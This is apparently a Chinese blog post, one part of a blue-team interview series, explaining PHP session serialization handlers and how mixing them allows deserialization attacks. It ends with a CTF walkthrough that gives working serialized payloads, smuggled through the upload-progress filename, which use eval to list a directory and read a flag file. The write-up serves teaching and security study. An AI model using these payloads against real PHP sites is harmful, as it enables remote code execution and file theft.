红蓝对抗之蓝队面试题part 4
什么是session
官方Session定义:在计算机中,尤其是在网络应用中,称为“会话控制”。Session对象存储特定用户会话所需的属性及配置信息。主要有以下特点:
session保存的位置是在服务器端
session通常是要配合cookie使用
因为HTTP的无状态性,服务端产生了session来标识当前的用户状态
本质上,session就是一种可以维持服务器端的数据存储技术。即**session技术就是一种基于后端有别于数据库的临时存储数据的技术**
PHP session工作流程
以PHP为例,理解session的原理
1.PHP脚本使用 session_start()时开启session会话,会自动检测PHPSESSID* 如果Cookie中存在,获取PHPSESSID* 如果Cookie中不存在,创建一个PHPSESSID,并通过响应头以Cookie形式保存到浏览器2.初始化超全局变量$_SESSION为一个空数组3.PHP通过PHPSESSID去指定位置(PHPSESSID文件存储位置)匹配对应的文件* 存在该文件:读取文件内容(通过反序列化方式),将数据存储到$_SESSION中* 不存在该文件: session_start()创建一个PHPSESSID命名文件4.程序执行结束,将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中具体原理图:
【一>所有资源获取<一】 1、网络安全学习路线 2、电子书籍(白帽子) 3、安全大厂内部视频 4、100份src文档 5、常见安全面试题 6、ctf大赛经典题目解析 7、全套工具包 8、应急响应笔记
php.ini session配置
php.ini里面有较重要的session配置项
session.save_path="/tmp"--设置session文件的存储位置
session.save_handler=files--设定用户自定义存储函数,如果想使用PHP内置session存储机制之外的可以使用这个函数
session.auto_start= 0--指定会话模块是否在请求开始时启动一个会话,默认值为 0,不启动
session.serialize_handler= php --定义用来序列化/反序列化的处理器名字,默认使用phpsession.upload_progress.enabled= On --启用上传进度跟踪,并填充$ _SESSION变量,默认启用
session.upload_progress.cleanup= oN --读取所有POST数据(即完成上传)后立即清理进度信息,默认启用
PHP session序列化机制
根据php.ini中的配置项,我们研究将$_SESSION中保存的所有数据序列化存储到PHPSESSID对应的文件中,使用的三种不同的处理格式,即session.serialize_handler定义的三种引擎:
处理器 |
对应的存储格式 |
php |
键名 + 竖线 + 经过 serialize() 函数反序列处理的值 |
php_binary |
键名的长度对应的 ASCII 字符 + 键名 + 经过 serialize() 函数反序列处理的值 |
php_serialize (php>=5.5.4) |
经过 serialize() 函数反序列处理的数组 |
php处理器
首先来看看默认session.serialize_handler = php时候的序列化结果,代码如下
<?php
//ini_set('session.serialize_handler','php');
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>
为了方便查看,将session存储目录设置为session.save_path = "/www/php_session",PHPSESSID文件如下
1、文件名
文件名为sess_mpnnbont606f50eb178na451od,其中mpnnbont606f50eb178na451od就是后续请求头中Cookie携带的PHPSESSID的值 (如上图浏览器中已存储)
2、文件内容
php处理器存储格式
键名 |
竖线 |
经过 serialize() 函数反序列处理的值 |
$_SESSION['name']的键名:name |
php_binary处理器
使用php_binary处理器,即session.serialize_handler = php_binary
<?php
ini_set('session.serialize_handler','php_binary');
session_start();
# 为了方便ACSII显示,将键名设置为36个字符长度
$_SESSION['namenamenamenamenamenamenamenamename'] = $_GET['name'];
echo $_SESSION['namenamenamenamenamenamenamenamename'];
?>
由于三种方式PHPSESSID文件名都是一样的,这里只需要查看文件内容
键名的长度对应的 ASCII 字符 |
键名 |
经过 serialize() 函数反序列处理的值. |
$ |
namenamenamenamenamenamenamenamename |
s:6:"harden"; |
php_serialize 处理器
使用php_binary处理器,即session.serialize_handler = php_serialize
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['name'] = $_GET['name'];
echo $_SESSION['name'];
?>
文件内容即经过 serialize() 函数反序列处理的数组,a:1:{s:4:"name";s:6:"harden";}
session的反序列化漏洞利用
session的反序列化漏洞,就是利用php处理器和php_serialize处理器的存储格式差异而产生,通过具体的代码我们来看下漏洞出现的原因
漏洞成因
首先创建session.php,使用php_serialize处理器来存储session数据
<?php
ini_set('session.serialize_handler','php_serialize');
session_start();
$_SESSION['session'] = $_GET['session'];
echo $_SESSION['session'];
?>
test.php,使用默认php处理器来存储session数据
<?php
session_start();
class f4ke{public $name;function __wakeup(){echo "Who are you?";}function __destruct(){eval($this->name);}
}
$str = new f4ke();
?>
接着,我们构建URL进行访问session.php:
http://www.session-serialize.com/session.php?session=|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
打开PHPSESSID文件可看到序列化存储的内容
a:1:{s:7:"session";s:45:"|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}
漏洞分析:
在session.php程序执行,我们将|O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}通过php_serialize处理器序列化保存成PHPSESSID文件;
由于浏览器中保存的PHPSESSID文件名不变,当我们访问test.php,session_start();找到PHPSESSID文件并使用php处理器反序列化文件内容,识别格式即php处理器会以|作为分隔符,将O:4:"f4ke":1:{s:4:"name";s:10:"phpinfo();";}反序列化,就会触发__wakeup()方法,最后对象销毁执行__destruct()方法中的eval()函数,相当于执行如下:
$_SESSION['session'] = new f4ke(); $_SESSION['session']->name = 'phpinfo();';
我们访问test.php,即可直接执行phpinfo()函数
CTF例题:PHPINFO
题目地址:http://web.jarvisoj.com:32784/index.php
<?php
//A webshell is wait for you
ini_set('session.serialize_handler', 'php');
session_start();
class OowoO {public $mdzz;function __construct() {$this->mdzz = 'phpinfo();';}function __destruct() {eval($this->mdzz);}
}
if(isset($_GET['phpinfo']))
{$m = new OowoO();
}
else
{highlight_string(file_get_contents('index.php'));
}
?>
我们可以看到ini_set('session.serialize_handler', 'php'),判断可能存在session反序列化漏洞,根据代码逻辑,访问URL加上phpinfo参数新建对象触发魔术方法执行phpinfo()函数,进一步查看session.serialize_handler配置
可见php.ini中session.serialize_handler = php_serialize,当前目录中被设置为session.serialize_handler = php,因此存在session反序列化利用的条件
补充知识
phpinfo文件中
local value(局部变量:作用于当前目录程序,会覆盖master value内容):php master value(主变量:php.ini里面的内容):php_serialize
那么我们如何找到代码入口将利用代码写入到session文件?想要写入session文件就得想办法在$_SESSION变量中增加我们可控的输入点
补充知识
Session 上传进度(此特性自 PHP 5.4.0 后可用)
当 session.upload_progress.enabledINI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态
当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,上传进度可以在[SESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。当PHP检测到这种POST请求时,它会在‘_SESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。 当PHP检测到这种POST请求时,它会在`SESSION](https://www.php.net/manual/zh/reserved.variables.session.php)中获得。当PHP检测到这种POST请求时,它会在‘_SESSION`中添加一组数据, 索引是 session.upload_progress.prefix与 session.upload_progress.name连接在一起的值。
翻译成人话就是,当检测Session 上传进度这一特性是开启状态,我们可以在客户端写一个文件上传的功能,文件上传的同时,POST一个与php.ini中设置的session.upload_progress.name同名变量PHP_SESSION_UPLOAD_PROGRESS,如下图,即可写入$_SESSION,进一步序列化写入session文件
下面是官方给出的一个文件上传时监测进度例子:
<form action="upload.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="<?php echo ini_get("session.upload_progress.name"); ?>" value="123" /><input type="file" name="file1" /><input type="file" name="file2" /><input type="submit" />
</form>
其中name=""也可以设置为name="PHP_SESSION_UPLOAD_PROGRESS"
在session中存储的上传进度,如下所示:
<?php
$_SESSION["upload_progress_123"] = array("start_time" => 1234567890, // The request time请求时间"content_length" => 57343257, // POST content length 长度"bytes_processed" => 453489,// Amount of bytes received and processed 已接收字节"done" => false,// true when the POST handler has finished, successfully or not 是否上传完成"files" => array(//上传的文件0 => array( "field_name" => "file1", // Name of the <input/> fieldinput中设定的变量名 // The following 3 elements equals those in $_FILES "name" => "foo.avi", //文件名 "tmp_name" => "/tmp/phpxxxxxx", "error" => 0, "done" => true,// True when the POST handler has finished handling this file "start_time" => 1234567890,// When this file has started to be processed "bytes_processed" => 57343250, // Amount of bytes received and processed for this file),// An other file, not finished uploading, in the same request1 => array( "field_name" => "file2", "name" => "bar.avi", "tmp_name" => NULL, "error" => 0, "done" => false, "start_time" => 1234567899, "bytes_processed" => 54554,),)
);
其中,session中的field_name和name都是我们可控的输入点!
下面我们就开始解题拿到flag
首先,http://web.jarvisoj.com:32784/index.php?phpinfo查询设置
session.upload_progress.enabled = On --表明允许上传进度跟踪,并填充$ _SESSION变量
session.upload_progress.cleanup = Off--表明所有POST数据(即完成上传)后,不清理进度信息($ _SESSION变量)
即允许上传进度跟踪且结束后不清除数据,更有利使用session.upload_progress.name来将利用代码写入session文件
构造POST表单提交上传文件
<form action="http://web.jarvisoj.com:32784/index.php" method="POST" enctype="multipart/form-data"><input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="123" /><input type="file" name="file" /><input type="submit" />
</form>
构造序列化字符串作为payload(利用代码)
<?php
class OowoO {public $mdzz='print_r(scandir(dirname(__FILE__)));';
}
$obj = new OowoO();
echo serialize($obj);
?>
//O:5:"OowoO":1:{s:4:"mdzz";s:36:"print_r(scandir(dirname(__FILE__)));";}
为了防止"被转义,我们在payload中加入\
随意选择文件,点击表单提交,使用抓包工具burpsuite抓取请求包
并修改filename值为
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:36:\"print_r(scandir(dirname(__FILE__)));\";}
发送请求包,代码执行过程分析:
因此直接执行print_r(scandir(dirname(__FILE__)));并返回
phpinfo查看当前目录,/opt/lampp/htdocs/
![](/assets/blank.gif)
构造最终payload读取Here_1s_7he_fl4g_buT_You_Cannot_see.php文件内容,即flag
|O:5:\"OowoO\":1:{s:4:\"mdzz\";s:88:\"print_r(file_get_contents(\"/opt/lampp/htdocs/Here_1s_7he_fl4g_buT_You_Cannot_see.php\"));\";}
红蓝对抗之蓝队面试题part 4相关推荐
- 红蓝对抗之蓝队防守:ATTCK框架的应用
企业大规模数字化转型的浪潮下,各类网络入侵事件频发.APT和黑客团伙活动猖獗,合规性驱动的传统安全防护建设已无法满足需求.近年来随着各级红蓝对抗行动的开展,企业安全建设正逐步向实战化转型,而MITRE ...
- 红蓝对抗-HW红蓝队基本知识
第一章 什么是蓝队 蓝队,一般是指网络实战攻防演习中的攻击一方. 蓝队一般会采用针对目标单位的从业人员,以及目标系统所在网络内的软件.硬件设备同时执行多角度.全方位.对抗性的混合式模拟攻击手段:通过技 ...
- 红蓝对抗-红队打点的那些事
红蓝对抗-红队打点的那些事 攻防演练中作为攻击方,效率很重要,例如2019 BCS红队行动议题: RedTeam-BCS 半自动化的资产收集 域名/IP/需要交互的系统 当拿到目标的时候,首先需要利用 ...
- 红蓝对抗系列之浅谈蓝队反制红队的手法一二
红蓝对抗系列之浅谈蓝队反制红队的手法一二 取证反查 针对ip 溯源一二 一般来说,红队大部分都是使用代理节点进行测试,假如我们捕获或者从样本里面分析拿到了真实ip ,那么以下操作场景就有用了,或者使用 ...
- 红蓝对抗-红队渗透下的入口权限快速获取
红队渗透下的入口权限快速获取 文章目录 红队渗透下的入口权限快速获取 前言 红队攻击流程概述 获取入口权限 利用常见组件的漏洞 高危漏洞的检测与攻击 POC的集成与自动化验证 POC bomber 前 ...
- 红蓝对抗——蓝队手册
0x01 前言 红蓝对抗的思想最早可追溯到我国现存最早的一部兵书<孙子兵法>,在孙子·谋攻篇有这么一句话:"知彼知己,百战不殆:",意为如果对敌我双方的情况都能了解透彻 ...
- 终于有人把红蓝对抗讲明白了
导读:什么是红蓝对抗? 我们现在所处的时代,有人称为网络时代,有人称为信息时代,也有人称为数据时代,不管名字怎么叫吧,我想有一件事已经成为了共识,那就是我们的安全观念得要跟上时代发展. 都知道重要的东 ...
- 红蓝对抗之邮件钓鱼攻击
文|腾讯蓝军 jumbo 红蓝对抗越加普遍及重要,甚至成为了大型赛事,随之⽽来的是防守方大量部署安全设备,如FW.WAF.IDS.IPS等,想要从Web端深⼊到对⽅内⽹已经困难重重.但是,⼈永远是最⼤ ...
- 宏观看红蓝对抗与渗透测试
文章目录 前言 1. 渗透测试为什么要存在 2. 红蓝对抗为什么要存在 3. 对于整个红蓝对抗事件的总结 3.1 从过程细节来说: 3.2 从根本提高安全能力的方法 3.2 攻击队成员进攻思路 3.2 ...
最新文章
- phpstorm failed to create jvm:error code -6 解决办法 解决方法
- 零基础如何学习java技术?
- rs232串口驱动_电机驱动器-copley
- oracle 使从表中随机取出一行记录数据
- Fedora 20 安装后的一些事情
- Kibana可视化管理页面详细使用说明
- 用python分析小说_用Python对哈利波特系列小说进行情感分析
- docker Redis集群
- jquery mobile常用的data-role类型
- Numpy重要模块——linalg线性代数详细参数及演示
- BZOJ4293 : [PA2015]Siano
- 真假Kingston U盘识别
- 银联支付接口申请流程-傲付宝
- r语言library什么意思_汽车自动挡上的P、R、N、D、S、L和M,都表示什么意思?
- 让你详细的了解数据库防火墙的功能
- 小程序源码:云开发表情包制作神器-多玩法安装简单
- 单源最短路径bellman算法
- QT图表chart-饼状图
- 新电脑 安装idea迁移设置和插件注意事项
- Unity中打开文件窗口(OpenFileDialog)的几种方法对比